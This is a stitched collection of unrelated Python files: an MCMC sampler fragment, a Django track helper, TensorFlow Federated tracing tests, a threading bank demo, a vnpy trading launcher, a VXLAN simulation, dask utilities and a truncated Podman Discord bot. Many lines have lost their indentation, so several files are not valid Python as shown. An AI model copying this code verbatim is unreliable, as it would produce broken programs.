for p in ps.values():
p.join()
p.terminate()
raise RuntimeError
else:
print("Starting position good. lnp: {}".format(lnp0))
try:
cov = np.load(config["opt_jump"])
print("using optimal jumps")
except (FileNotFoundError, KeyError):
print("using hand-specified jumps")
cov = utils.convert_dict(model, config["fix_params"], **config["jumps"])**2 * np.eye(dim)
sampler = MHSampler(cov, dim, lnprob)
for i, result in enumerate(sampler.sample(p0, iterations=config["samples"])):
if (i+1) % 20 == 0:
print("Iteration", i +1)
# Save the actual chain of samples
print("Acceptance fraction", sampler.acceptance_fraction)
np.save(routdir + "lnprob.npy", sampler.lnprobability)
np.save(routdir + "flatchain.npy", sampler.flatchain)
# Kill all of the orders
for pconn in pconns.values():
pconn.send(("FINISH", None))
pconn.send(("DIE", None))
# Join on everything and terminate
for p in ps.values():
p.join()
p.terminate()
import sys;sys.exit()
|
files.py
|
from django.apps import apps
from django.core.exceptions import ObjectDoesNotExist
from django.core.files.base import ContentFile, File
from io import BytesIO, StringIO
import os
from pydub import AudioSegment
import threading
Song = apps.get_model('content', 'Song')
Track = apps.get_model('content', 'Track')
Variable = apps.get_model('administration', 'Variable')
def _start_processing(song: Song):
"""
"""
from content.tasks import convert_track_task
use_celery_processing = Variable.objects.retrieve('audio-processing-use-celery', False, output_type=bool)
if use_celery_processing:
convert_track_task.s(str(song.id)) \
.set(countdown=10) \
.delay()
else:
t = threading.Thread(target=convert_track_task, args=[song])
        t.daemon = True
t.start()
def add_track_to_song(song: Song, track: File=None, editing: bool=False, admin_edit: bool=False):
# assert argument types
if not isinstance(song, Song): raise TypeError("Parameter 'song' must be a Song object")
    if track and not isinstance(track, File): raise TypeError(f"Parameter 'track' must be a File object. Type: {type(track)}")
# skip everything if there is no track
if (not track) and (not admin_edit):
raise ValueError("Must include a track object if not editing")
if editing or admin_edit:
# delete all existing tracks
# if reprocessing from admin, only delete processed tracks
tracks = song.tracks.all() if editing else song.tracks.filter(is_original=False)
tracks.delete()
if isinstance(track, str):
new_track = Track.objects.create(reference=track, is_original=True, song=song)
return new_track
elif isinstance(track, dict):
        new_track = Track.objects.create(reference=track['track'], is_original=True, song=song)
return new_track
else: # it's a file
if not admin_edit:
track_obj = Track.objects.create(file=track, is_original=True, song=song)
else:
# get the original track from the song
track_obj = song.tracks.first()
# raise an exception if there is no track
            if track_obj is None: raise ObjectDoesNotExist("Could not find a Track instance")
_start_processing(song)
    return track_obj
|
tracing_test.py
|
# Copyright 2019, The TensorFlow Federated Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import asyncio
import functools
import io
import logging as std_logging
import threading
import time
from absl import logging
from absl.testing import absltest
from tensorflow_federated.python.common_libs import tracing
# Traces may not run in _exactly_ one second, but we can assert it was at least
# one second; and most importantly the time should be logged.
ELAPSED_ONE_REGEX = r'Elapsed time [1-9][0-9]*\.[0-9]+'
class DebugLoggingTest(absltest.TestCase):
def setUp(self):
super().setUp()
self.log = io.StringIO()
self.handler = std_logging.StreamHandler(self.log)
std_logging.root.addHandler(self.handler)
def tearDown(self):
std_logging.root.removeHandler(self.handler)
self.handler.close()
super().tearDown()
def _test_debug_logging_with_async_function(self, async_fn, test_regex, *args,
**kwargs):
loop = asyncio.get_event_loop()
try:
logging.set_verbosity(1)
retval = loop.run_until_complete(async_fn(*args, **kwargs))
finally:
logging.set_verbosity(0)
self.assertRegexMatch(''.join(self.log.getvalue()), [test_regex])
self.log.truncate(0)
loop.run_until_complete(async_fn(*args, **kwargs))
self.assertEmpty(''.join(self.log.getvalue()))
return retval
def _test_debug_logging_with_sync_function(self, sync_fn, test_regex, *args,
**kwargs):
try:
logging.set_verbosity(1)
retval = sync_fn(*args, **kwargs)
finally:
logging.set_verbosity(0)
self.assertRegexMatch(''.join(self.log.getvalue()), [test_regex])
self.log.truncate(0)
    sync_fn(*args, **kwargs)
    self.assertEmpty(''.join(self.log.getvalue()))
return retval
def test_logging_enter_exit(self):
@tracing.trace
async def foo():
return await asyncio.sleep(1)
self._test_debug_logging_with_async_function(
foo, '.*Entering .*foo.*\n.*Exiting .*foo.*')
def test_logging_timing_captured(self):
@tracing.trace
async def foo():
return await asyncio.sleep(1)
self._test_debug_logging_with_async_function(foo, 'Elapsed time')
def test_logging_timing_captures_value_around_async_call(self):
@tracing.trace
async def foo():
return await asyncio.sleep(1)
self._test_debug_logging_with_async_function(
foo, r'<locals>\.foo\. ' + ELAPSED_ONE_REGEX)
def test_logging_non_blocking_function(self):
@tracing.trace(span=True)
async def foo():
return await asyncio.gather(
asyncio.sleep(1), asyncio.sleep(1), asyncio.sleep(1))
self._test_debug_logging_with_async_function(
foo, r'<locals>\.foo\. ' + ELAPSED_ONE_REGEX)
def test_logging_non_blocking_method(self):
class AClass(absltest.TestCase):
@tracing.trace(span=True)
async def async_method(self, foo_arg, bar_arg, arg3=None, arg4=None):
self.assertEqual('foo', foo_arg)
self.assertEqual('bar', bar_arg)
self.assertIsNotNone(arg3)
self.assertIsNotNone(arg4)
await asyncio.sleep(1)
return 3
a_class = AClass()
result = self._test_debug_logging_with_async_function(
a_class.async_method,
# Non-blocking may not run exactly one second, but we can assert it was
# at least one second; and most importantly it should be logged.
r'AClass\.async_method\. ' + ELAPSED_ONE_REGEX,
'foo',
'bar',
arg3='baz',
arg4=True)
self.assertEqual(3, result)
def test_logging_blocking_method(self):
class AClass(absltest.TestCase):
@tracing.trace(span=True)
def sync_method(self, foo_arg, bar_arg, arg3=None, arg4=None):
self.assertEqual('foo', foo_arg)
self.assertEqual('bar', bar_arg)
self.assertIsNotNone(arg3)
self.assertIsNotNone(arg4)
# Sleep for 1s is used to test that we measured runtime correctly
time.sleep(1)
return 3
a_class = AClass()
result = self._test_debug_logging_with_sync_function(
a_class.sync_method,
r'AClass\.sync_method\. ' + ELAPSED_ONE_REGEX,
'foo',
'bar',
arg3='baz',
arg4=True)
self.assertEqual(3, result)
def test_logging_blocking_function(self):
@tracing.trace(span=True)
def foo(foo_arg, bar_arg, arg3=None, arg4=None):
self.assertEqual('foo', foo_arg)
self.assertEqual('bar', bar_arg)
self.assertIsNotNone(arg3)
self.assertIsNotNone(arg4)
# Sleep for 1s is used to test that we measured runtime correctly
time.sleep(1)
return 3
result = self._test_debug_logging_with_sync_function(
foo,
r'<locals>\.foo\. ' + ELAPSED_ONE_REGEX,
'foo',
'bar',
arg3='baz',
arg4=True)
self.assertEqual(3, result)
class MockTracingProvider(tracing.TracingProvider):
def __init__(self):
self.scopes = []
self.sub_scopes = []
self.nonces = []
self.parent_span_yields = []
self.fn_argss = []
self.fn_kwargss = []
self.trace_optss = []
self.trace_results = []
def span(self, scope, sub_scope, nonce, parent_span_yield, fn_args, fn_kwargs,
trace_opts):
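    # span() is a generator: the value yielded here becomes parent_span_yield for
    # nested spans, and the tracing machinery later sends the trace result back
    # into the generator, where it lands in `result` below.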
self.scopes.append(scope)
self.sub_scopes.append(sub_scope)
self.nonces.append(nonce)
self.parent_span_yields.append(parent_span_yield)
self.fn_argss.append(fn_args)
self.fn_kwargss.append(fn_kwargs)
self.trace_optss.append(trace_opts)
if parent_span_yield is None:
new_yield = 0
else:
new_yield = parent_span_yield + 1
result = yield new_yield
self.trace_results.append(result)
def set_mock_trace() -> MockTracingProvider:
mock = MockTracingProvider()
tracing.set_tracing_providers([mock])
return mock
class TracingProviderInterfaceTest(absltest.TestCase):
def test_basic_span(self):
mock = set_mock_trace()
with tracing.span('scope', 'sub_scope', options='some_option'):
pass
self.assertEqual(mock.scopes[0], 'scope')
self.assertEqual(mock.sub_scopes[0], 'sub_scope')
self.assertEqual(mock.parent_span_yields[0], None)
self.assertEqual(mock.fn_argss[0], None)
self.assertEqual(mock.fn_kwargss[0], None)
self.assertEqual(mock.trace_optss[0], {'options': 'some_option'})
self.assertIsInstance(mock.trace_results[0], tracing.TracedSpan)
def test_sibling_spans(self):
mock = set_mock_trace()
with tracing.span('parent', ''):
with tracing.span('child1', ''):
pass
with tracing.span('child2', ''):
pass
with tracing.span('parentless', ''):
pass
self.assertEqual(mock.scopes, ['parent', 'child1', 'child2', 'parentless'])
self.assertEqual(mock.parent_span_yields, [None, 0, 0, None])
def test_nested_non_async_span(self):
mock = set_mock_trace()
with tracing.span('outer', 'osub'):
with tracing.span('middle', 'msub'):
with tracing.span('inner', 'isub'):
pass
self.assertEqual(mock.scopes, ['outer', 'middle', 'inner'])
self.assertEqual(mock.sub_scopes, ['osub', 'msub', 'isub'])
self.assertEqual(mock.parent_span_yields, [None, 0, 1])
def test_basic_trace(self):
mock = set_mock_trace()
class MyClass:
@tracing.trace(options='some_option')
def my_func(a, b, kw=None): # pylint: disable=no-self-argument
del a, b, kw
return 5
MyClass.my_func(1, 2, kw=3)
self.assertEqual(mock.scopes[0], 'MyClass')
self.assertEqual(mock.sub_scopes[0], 'my_func')
self.assertEqual(mock.parent_span_yields[0], None)
self.assertEqual(mock.fn_argss[0], (1, 2))
self.assertEqual(mock.fn_kwargss[0], {'kw': 3})
self.assertEqual(mock.trace_optss[0], {'options': 'some_option'})
self.assertIsInstance(mock.trace_results[0], tracing.TracedFunctionReturned)
self.assertEqual(mock.trace_results[0].value, 5)
def test_trace_throws(self):
mock = set_mock_trace()
class MyClass:
@tracing.trace
def my_func(): # pylint: disable=no-method-argument
raise ValueError(5)
try:
MyClass.my_func()
raise AssertionError('should have thrown')
except ValueError:
pass
self.assertIsInstance(mock.trace_results[0], tracing.TracedFunctionThrew)
self.assertEqual(mock.trace_results[0].error_type, ValueError)
self.assertIsInstance(mock.trace_results[0].error_value, ValueError)
def test_parenting_non_async_to_async_to_nested_async(self):
mock = set_mock_trace()
loop = asyncio.new_event_loop()
loop.set_task_factory(tracing.propagate_trace_context_task_factory)
def run_loop():
loop.run_forever()
loop.close()
thread = threading.Thread(target=functools.partial(run_loop), daemon=True)
thread.start()
@tracing.trace
async def middle():
with tracing.span('inner', ''):
pass
with tracing.span('outer', ''):
# This sends the coroutine over to another thread,
# keeping the current trace context.
coro_with_trace_ctx = tracing.wrap_coroutine_in_current_trace_context(
middle())
asyncio.run_coroutine_threadsafe(coro_with_trace_ctx, loop).result()
loop.call_soon_threadsafe(loop.stop)
thread.join()
self.assertEqual(mock.parent_span_yields, [None, 0, 1])
self.assertEqual(mock.scopes, ['outer', '<locals>', 'inner'])
self.assertEqual(mock.sub_scopes, ['', 'middle', ''])
if __name__ == '__main__':
absltest.main()
|
safe_bank.py
|
import datetime
import random
import time
from threading import Thread, RLock
from typing import List
class Account:
def __init__(self, balance=0):
self.balance = balance
def main():
accounts = create_accounts()
total = sum(a.balance for a in accounts)
validate_bank(accounts, total)
print("Starting transfers...")
jobs = [
Thread(target=do_bank_stuff, args=(accounts, total)),
Thread(target=do_bank_stuff, args=(accounts, total)),
Thread(target=do_bank_stuff, args=(accounts, total)),
Thread(target=do_bank_stuff, args=(accounts, total)),
Thread(target=do_bank_stuff, args=(accounts, total)),
]
t0 = datetime.datetime.now()
[j.start() for j in jobs]
[j.join() for j in jobs]
dt = datetime.datetime.now() - t0
print("Transfers complete ({:,.2f}) sec".format(dt.total_seconds()))
validate_bank(accounts, total)
def do_bank_stuff(accounts, total):
for _ in range(1, 10000):
a1, a2 = get_two_accounts(accounts)
amount = random.randint(1, 100)
do_transfer(a1, a2, amount)
validate_bank(accounts, total, quiet=True)
def create_accounts() -> List[Account]:
return [
Account(balance=5000),
Account(balance=10000),
Account(balance=7500),
Account(balance=7000),
Account(balance=6000),
Account(balance=9000),
]
transfer_lock = RLock()
def do_transfer(from_account: Account, to_account: Account, amount: int):
if from_account.balance < amount:
return
# Not so good:
# transfer_lock.acquire()
#
# from_account.balance -= amount
# time.sleep(.000)
# to_account.balance += amount
#
# transfer_lock.release()
# good!
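    # The with-statement guarantees the lock is released even if an exception is
    # raised between the debit and the credit, unlike the manual
    # acquire()/release() pattern commented out above.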
with transfer_lock:
from_account.balance -= amount
time.sleep(0.000)
to_account.balance += amount
def validate_bank(accounts: List[Account], total: int, quiet=False):
with transfer_lock:
current = sum(a.balance for a in accounts)
if current != total:
print(
"ERROR: Inconsistent account balance: ${:,} vs ${:,}".format(
current, total
),
flush=True,
)
elif not quiet:
print("All good: Consistent account balance: ${:,}".format(total), flush=True)
def get_two_accounts(accounts):
a1 = random.choice(accounts)
a2 = a1
while a2 == a1:
a2 = random.choice(accounts)
return a1, a2
if __name__ == "__main__":
main()
|
runCtaTrading.py
|
# encoding: UTF-8
import multiprocessing
from time import sleep
from datetime import datetime, time
from vnpy.event import EventEngine2
from vnpy.trader.vtEvent import EVENT_LOG
from vnpy.trader.vtEngine import MainEngine, LogEngine
from vnpy.trader.gateway import ctpGateway
from vnpy.trader.app import ctaStrategy
from vnpy.trader.app.ctaStrategy.ctaBase import EVENT_CTA_LOG
#----------------------------------------------------------------------
def runChildProcess():
"""子进程运行函数"""
print '-'*20
# 创建日志引擎
le = LogEngine()
le.setLogLevel(le.LEVEL_INFO)
le.addConsoleHandler()
le.addFileHandler()
le.info(u'启动CTA策略运行子进程')
ee = EventEngine2()
le.info(u'事件引擎创建成功')
me = MainEngine(ee)
me.addGateway(ctpGateway)
me.addApp(ctaStrategy)
le.info(u'主引擎创建成功')
ee.register(EVENT_LOG, le.processLogEvent)
ee.register(EVENT_CTA_LOG, le.processLogEvent)
le.info(u'注册日志事件监听')
me.connect('CTP')
le.info(u'连接CTP接口')
sleep(5) # 等待CTP接口初始化
cta = me.getApp(ctaStrategy.appName)
cta.loadSetting()
le.info(u'CTA策略载入成功')
cta.initAll()
le.info(u'CTA策略初始化成功')
cta.startAll()
le.info(u'CTA策略启动成功')
while True:
sleep(1)
#----------------------------------------------------------------------
def runParentProcess():
"""父进程运行函数"""
# 创建日志引擎
le = LogEngine()
le.setLogLevel(le.LEVEL_INFO)
le.addConsoleHandler()
le.info(u'启动CTA策略守护父进程')
DAY_START = time(8, 45) # 日盘启动和停止时间
DAY_END = time(15, 30)
NIGHT_START = time(20, 45) # 夜盘启动和停止时间
NIGHT_END = time(2, 45)
p = None # 子进程句柄
while True:
currentTime = datetime.now().time()
recording = False
# 判断当前处于的时间段
if ((currentTime >= DAY_START and currentTime <= DAY_END) or
(currentTime >= NIGHT_START) or
(currentTime <= NIGHT_END)):
recording = True
# 记录时间则需要启动子进程
if recording and p is None:
le.info(u'启动子进程')
p = multiprocessing.Process(target=runChildProcess)
p.start()
le.info(u'子进程启动成功')
# 非记录时间则退出子进程
if not recording and p is not None:
le.info(u'关闭子进程')
p.terminate()
p.join()
p = None
le.info(u'子进程关闭成功')
sleep(5)
if __name__ == '__main__':
runChildProcess()
# Although this mode also runs unattended, a manual check at each daily start-up is strongly recommended; you are responsible for your own PNL.
#runParentProcess()
|
main.py
|
#!/usr/bin/env python
# Copyright (c) PLUMgrid, Inc.
# Licensed under the Apache License, Version 2.0 (the "License")
from builtins import input
from http.server import HTTPServer, SimpleHTTPRequestHandler
from netaddr import IPNetwork
from os import chdir
from pyroute2 import IPRoute, NetNS, IPDB, NSPopen
from random import choice, randint
from simulation import Simulation
from socket import htons
from threading import Thread
import sys
ipr = IPRoute()
ipdb = IPDB(nl=ipr)
num_hosts = 9
num_vnis = 4
null = open("/dev/null", "w")
class TunnelSimulation(Simulation):
def __init__(self, ipdb):
super(TunnelSimulation, self).__init__(ipdb)
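        # One pool of guest addresses (192.168.<vni>.1-254) per VNI; entries are
        # popped off as veth endpoints are created in start().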
self.available_ips = [list(IPNetwork("192.168.%d.0/24" % i)[1:-1])
for i in range(0, num_vnis)]
def start(self):
# each entry is tuple of ns_ipdb, out_ifc, in_ifc
host_info = []
for i in range(0, num_hosts):
print("Launching host %i of %i" % (i + 1, num_hosts))
ipaddr = "172.16.1.%d/24" % (100 + i)
host_info.append(self._create_ns("host%d" % i, ipaddr=ipaddr))
with self.ipdb.create(ifname="br100", kind="bridge") as br100:
for host in host_info: br100.add_port(host[1])
br100.up()
# create a vxlan device inside each namespace
for host in host_info:
print("Starting tunnel %i of %i" % (len(self.processes) + 1, num_hosts))
cmd = ["netserver", "-D"]
self.processes.append(NSPopen(host[0].nl.netns, cmd, stdout=null))
for i in range(0, num_vnis):
with host[0].create(ifname="vxlan%d" % i, kind="vxlan",
vxlan_id=10000 + i,
vxlan_link=host[0].interfaces.eth0,
vxlan_port=htons(4789),
vxlan_group="239.1.1.%d" % (1 + i)) as vx:
vx.up()
with host[0].create(ifname="br%d" % i, kind="bridge") as br:
br.add_port(host[0].interfaces["vxlan%d" % i])
br.up()
with host[0].create(ifname="c%da" % i, kind="veth",
peer="c%db" % i) as c:
c.up()
c.add_ip("%s/24" % self.available_ips[i].pop(0))
c.mtu = 1450
br.add_port(host[0].interfaces["c%db" % i])
host[0].interfaces["c%db" % i].up().commit()
# pick one host to start the monitor in
host = host_info[0]
cmd = ["python", "monitor.py"]
p = NSPopen(host[0].nl.netns, cmd)
self.processes.append(p)
def serve_http(self):
chdir("chord-transitions")
# comment below line to see http server log messages
SimpleHTTPRequestHandler.log_message = lambda self, format, *args: None
self.srv = HTTPServer(("", 8080), SimpleHTTPRequestHandler)
self.t = Thread(target=self.srv.serve_forever)
        self.t.daemon = True
self.t.start()
print("HTTPServer listening on 0.0.0.0:8080")
try:
sim = TunnelSimulation(ipdb)
sim.start()
sim.serve_http()
input("Press enter to quit:")
finally:
if "br100" in ipdb.interfaces: ipdb.interfaces.br100.remove().commit()
sim.release()
ipdb.release()
null.close()
|
dask.py
|
# This file is part of the Open Data Cube, see https://opendatacube.org for more information
#
# Copyright (c) 2015-2020 ODC Contributors
# SPDX-License-Identifier: Apache-2.0
""" Dask Distributed Tools
"""
from typing import Any, Iterable, Optional, Union, Tuple
from random import randint
import toolz
import queue
from dask.distributed import Client
import dask
import threading
import logging
import os
__all__ = (
"start_local_dask",
"pmap",
"compute_tasks",
"partition_map",
"save_blob_to_file",
"save_blob_to_s3",
)
_LOG = logging.getLogger(__name__)
def get_total_available_memory(check_jupyter_hub=True):
""" Figure out how much memory is available
1. Check MEM_LIMIT environment variable, set by jupyterhub
    2. Use hardware information if that is not set
"""
if check_jupyter_hub:
mem_limit = os.environ.get('MEM_LIMIT', None)
if mem_limit is not None:
return int(mem_limit)
from psutil import virtual_memory
return virtual_memory().total
def compute_memory_per_worker(n_workers: int = 1,
mem_safety_margin: Optional[Union[str, int]] = None,
memory_limit: Optional[Union[str, int]] = None) -> int:
""" Figure out how much memory to assign per worker.
result can be passed into ``memory_limit=`` parameter of dask worker/cluster/client
"""
from dask.utils import parse_bytes
if isinstance(memory_limit, str):
memory_limit = parse_bytes(memory_limit)
if isinstance(mem_safety_margin, str):
mem_safety_margin = parse_bytes(mem_safety_margin)
if memory_limit is None and mem_safety_margin is None:
total_bytes = get_total_available_memory()
        # reserve 500 MiB, or half of all memory if total RAM is less than 1 GiB
mem_safety_margin = min(500*(1024*1024), total_bytes//2)
elif memory_limit is None:
total_bytes = get_total_available_memory()
elif mem_safety_margin is None:
total_bytes = memory_limit
mem_safety_margin = 0
else:
total_bytes = memory_limit
return (total_bytes - mem_safety_margin)//n_workers
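# Worked example (hypothetical numbers): with 16 GiB of RAM and no explicit limits,
# the safety margin is 500 MiB, so n_workers=4 gives each worker roughly
# (16 GiB - 500 MiB) / 4, i.e. about 3.9 GiB.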
def start_local_dask(n_workers: int = 1,
threads_per_worker: Optional[int] = None,
mem_safety_margin: Optional[Union[str, int]] = None,
memory_limit: Optional[Union[str, int]] = None,
**kw):
"""
Wrapper around ``distributed.Client(..)`` constructor that deals with memory better.
It also configures ``distributed.dashboard.link`` to go over proxy when operating
from behind jupyterhub.
:param n_workers: number of worker processes to launch
:param threads_per_worker: number of threads per worker, default is as many as there are CPUs
:param memory_limit: maximum memory to use across all workers
:param mem_safety_margin: bytes to reserve for the rest of the system, only applicable
if ``memory_limit=`` is not supplied.
.. note::
if ``memory_limit=`` is supplied, it will be parsed and divided equally between workers.
"""
# if dashboard.link set to default value and running behind hub, make dashboard link go via proxy
if dask.config.get("distributed.dashboard.link") == '{scheme}://{host}:{port}/status':
jup_prefix = os.environ.get('JUPYTERHUB_SERVICE_PREFIX')
if jup_prefix is not None:
jup_prefix = jup_prefix.rstrip('/')
dask.config.set({"distributed.dashboard.link": f"{jup_prefix}/proxy/{{port}}/status"})
memory_limit = compute_memory_per_worker(n_workers=n_workers,
memory_limit=memory_limit,
mem_safety_margin=mem_safety_margin)
client = Client(n_workers=n_workers,
threads_per_worker=threads_per_worker,
memory_limit=memory_limit,
**kw)
return client
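# Example (assumed invocation): start_local_dask(n_workers=2, memory_limit='8G')
# parses the limit and hands each worker 4G, as noted in the docstring above.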
def _randomize(prefix):
return '{}-{:08x}'.format(prefix, randint(0, 0xFFFFFFFF))
def partition_map(n: int, func: Any, its: Iterable[Any],
name: str = 'compute') -> Iterable[Any]:
"""
Parallel map in lumps.
Partition sequence into lumps of size ``n``, then construct dask delayed computation evaluating to:
.. code-block:: python
[func(x) for x in its[0:1n]],
[func(x) for x in its[n:2n]],
...
[func(x) for x in its[..]],
This is useful when you need to process a large number of small (quick) tasks (pixel drill for example).
:param n: number of elements to process in one go
:param func: Function to apply (non-dask)
    :param its: Values to feed to func
:param name: How the computation should be named in dask visualizations
Returns
-------
Iterator of ``dask.Delayed`` objects.
"""
def lump_proc(dd):
return [func(d) for d in dd]
proc = dask.delayed(lump_proc, nout=1, pure=True)
data_name = _randomize('data_' + name)
name = _randomize(name)
for i, dd in enumerate(toolz.partition_all(n, its)):
lump = dask.delayed(dd,
pure=True,
traverse=False,
name=data_name + str(i))
yield proc(lump, dask_key_name=name + str(i))
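# A minimal usage sketch (process_pixel and pixel_ids are hypothetical names):
#
#   tasks = partition_map(100, process_pixel, pixel_ids, name='drill')
#   lumps = dask.compute(*tasks)
#   results = [r for lump in lumps for r in lump]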
def compute_tasks(tasks: Iterable[Any], client: Client,
max_in_flight: int = 3) -> Iterable[Any]:
""" Parallel compute stream with back pressure.
Equivalent to:
.. code-block:: python
(client.compute(task).result()
for task in tasks)
but with up to ``max_in_flight`` tasks being processed at the same time.
Input/Output order is preserved, so there is a possibility of head of
line blocking.
.. note::
lower limit is 3 concurrent tasks to simplify implementation,
there is no point calling this function if you want one active
task and supporting exactly 2 active tasks is not worth the complexity,
for now. We might special-case 2 at some point.
"""
# New thread:
# 1. Take dask task from iterator
# 2. Submit to client for processing
    # 3. Send it off to wrk_q
#
# Calling thread:
# 1. Pull scheduled future from wrk_q
# 2. Wait for result of the future
# 3. yield result to calling code
from .generic import it2q, qmap
# (max_in_flight - 2) -- one on each side of queue
wrk_q = queue.Queue(maxsize=max(1, max_in_flight - 2)) # type: queue.Queue
# fifo_timeout='0ms' ensures that priority of later tasks is lower
futures = (client.compute(task, fifo_timeout='0ms') for task in tasks)
in_thread = threading.Thread(target=it2q, args=(futures, wrk_q))
in_thread.start()
yield from qmap(lambda f: f.result(), wrk_q)
in_thread.join()
def pmap(func: Any,
its: Iterable[Any],
client: Client,
lump: int = 1,
max_in_flight: int = 3,
name: str = 'compute') -> Iterable[Any]:
""" Parallel map with back pressure.
Equivalent to this:
.. code-block:: python
(func(x) for x in its)
Except that ``func(x)`` runs concurrently on dask cluster.
:param func: Method that will be applied concurrently to data from ``its``
:param its: Iterator of input values
:param client: Connected dask client
:param lump: Group this many datasets into one task
:param max_in_flight: Maximum number of active tasks to submit
:param name: Dask name for computation
"""
max_in_flight = max_in_flight // lump
tasks = partition_map(lump, func, its, name=name)
for xx in compute_tasks(tasks, client=client, max_in_flight=max_in_flight):
yield from xx
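# Usage sketch (process_dataset and datasets are hypothetical names):
#
#   client = start_local_dask(n_workers=4)
#   for value in pmap(process_dataset, datasets, client=client, lump=10):
#       print(value)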
def _save_blob_to_file(data: Union[bytes, str],
fname: str,
with_deps=None) -> Tuple[str, bool]:
if isinstance(data, str):
data = data.encode('utf8')
try:
with open(fname, 'wb') as f:
f.write(data)
except IOError:
return (fname, False)
return (fname, True)
def _save_blob_to_s3(data: Union[bytes, str],
url: str,
profile: Optional[str] = None,
creds = None,
region_name: Optional[str] = None,
with_deps=None,
**kw) -> Tuple[str, bool]:
from botocore.errorfactory import ClientError
from botocore.credentials import ReadOnlyCredentials
from botocore.exceptions import BotoCoreError
from .aws import s3_dump, s3_client
try:
s3 = s3_client(profile=profile,
creds=creds,
region_name=region_name,
cache=True)
result = s3_dump(data, url, s3=s3, **kw)
except (IOError, BotoCoreError, ClientError):
result = False
return url, result
_save_blob_to_file_delayed = dask.delayed(_save_blob_to_file, name='save-to-disk', pure=False)
_save_blob_to_s3_delayed = dask.delayed(_save_blob_to_s3, name='save-to-s3', pure=False)
def save_blob_to_file(data,
fname,
with_deps=None):
"""
Dump from memory to local filesystem as a dask delayed operation.
:param data: Data blob to save to file (have to fit into memory all at once),
strings will be saved in UTF8 format.
:param fname: Path to file
:param with_deps: Useful for introducing dependencies into dask graph,
for example save yaml file after saving all tiff files.
Returns
-------
``(FilePath, True)`` tuple on success
``(FilePath, False)`` on any error
.. note::
Dask workers must be local or have network filesystem mounted in
the same path as calling code.
"""
return _save_blob_to_file_delayed(data, fname, with_deps=with_deps)
def save_blob_to_s3(data,
url,
profile=None,
creds=None,
region_name=None,
with_deps=None,
**kw):
"""
Dump from memory to S3 as a dask delayed operation.
:param data: Data blob to save to file (have to fit into memory all at once)
:param url: Url in a form s3://bucket/path/to/file
:param profile: Profile name to lookup (only used if session is not supplied)
:param creds: Override credentials with supplied data
:param region_name: Region name to use, overrides session setting
:param with_deps: Useful for introducing dependencies into dask graph,
for example save yaml file after saving all tiff files.
:param kw: Passed on to ``s3.put_object(..)``, useful for things like ContentType/ACL
Returns
-------
``(url, True)`` tuple on success
``(url, False)`` on any error
"""
return _save_blob_to_s3_delayed(data, url,
profile=profile,
creds=creds,
region_name=region_name,
with_deps=with_deps,
**kw)
|
index.py
|
import asyncio
import discord
from discord.ext import commands
import aiohttp
from requests_html import AsyncHTMLSession
import nest_asyncio
import json
import socket
from tweepy.streaming import StreamListener
from tweepy import OAuthHandler
from tweepy import Stream
import threading
import requests
try:
import config
except ModuleNotFoundError:
import example_config as config
nest_asyncio.apply()
twitter_id = "1407427126710747142"
sending = False
class PodmanTweetStreamer(StreamListener):
def on_data(self, tweet):
parsed_data = json.loads(tweet)
data = {
"username": "Podman",
"content": "@everyone",
"allowed_mentions": {"parse": ["everyone"]},
"author": {
"name": "Podman",
"icon_url": "https://github.com/containers/podman/\
blob/main/logo/podman-logo.png",
},
"embeds": [
{
"description": f"{parsed_data['text']}",
"title": "Announcement from Podman",
"footer": {"text": f"Posted at {parsed_data['created_at']}"},
}
],
}
requests.post(config.WEBHOOK_URL, json=data)
return True
def on_error(self, status_code):
if status_code == 420:
return False
return super().on_error(status_code)
bot = commands.Bot(
command_prefix=commands.when_mentioned_or(config.PREFIX),
intents=discord.Intents.default(),
help_command=None,
)
@bot.event
async def on_ready():
await bot.change_presence(activity=discord.Game(name="Podman"))
print(f"Logged in as {bot.user.name}")
return
@bot.command()
async def docs(ctx, *args):
"""[Renders the documentaion from docs.podman.io]
Args:
ctx : [context]
"""
if len(args) == 0 or len(args) > 1:
return await ctx.reply("`Invalid Arguments`")
arg = args[0]
query_url = (
f"https://docs.podman.io/en/latest/search.html?q={arg}&check_keywords=yes"
)
try:
session = AsyncHTMLSession()
response = await session.get(query_url)
except Exception:
return await ctx.send("`Failed to Establish Connection. Try again Later!`")
else:
await response.html.arender(sleep=2)
await session.close()
about = response.html.find(".search", first=True)
a = about.find("li")
pages = len(a)
title, res = "", []
print(a[0])
if not pages:
title = "`No Results Found`"
else:
title = f"`Results for: {arg}`"
for i in range(pages):
desc = f'[`{a[i].text}`]({str(list(a[i].find("a")[0].absolute_links)[0])})'
embed = discord.Embed(title=title, description=desc, color=0xE8E3E3)
res.append(embed)
cur_page = 0
reply_embed = await ctx.reply(embed=res[cur_page], mention_author=False)
await reply_embed.add_reaction("◀️")
await reply_embed.add_reaction("▶️")
await reply_embed.add_reaction("\U0001F5D1")
while True:
try:
reaction, user = await bot.wait_for(
"reaction_add",
check=lambda reaction, user: user == ctx.author
and str(reaction.emoji) in ["◀️", "▶️", "\U0001F5D1"],
timeout=60,
)
if str(reaction.emoji) == "▶️" and cur_page != pages:
cur_page += 1
await reply_embed.edit(embed=res[cur_page])
await reply_embed.remove_reaction(reaction, ctx.author)
elif str(reaction.emoji) == "◀️" and cur_page > 0:
cur_page -= 1
await reply_embed.edit(embed=res[cur_page])
await reply_embed.remove_reaction(reaction, ctx.author)
elif str(reaction.emoji) == "\U0001F5D1":
await reply_embed.delete()
else:
await reply_embed.remove_reaction(reaction, ctx.author)
except asyncio.TimeoutError:
await reply_embed.clear_reactions()
@bot.command()
async def inspect(ctx, *args):
"""[Fetch data from Docker Hub API, this is used to inspect the size of images]
Args:
ctx : [context]
"""
name = args[0]
async with aiohttp.ClientSession() as session:
async with session.get(
f"https://hub.docker.com/v2/repositories/library/{name}/tags"
) as response:
if response.status != 200:
return await ctx.reply("`Falied to fetch data | Try again later`")
data = await response.text()
json_data = json.loads(str(data))
res = []
for result in json_data["results"][:10]:
res.append(
f"`{name}:{result['name']} => {round(result['full_size']/(1048576),2)} MB`"
)
res[0] += "•"
embed = discord.Embed(
title=f"`Results for {name}`",
description="\n•".join(res),
color=0xE8E3E3,
)
return await ctx.send(embed=embed)
# TODO: Do not hardcode the links
@bot.command()
async def links(ctx, *args):
"""[Render important links]
Args:
ctx, *args: [context and tuple arguments]
"""
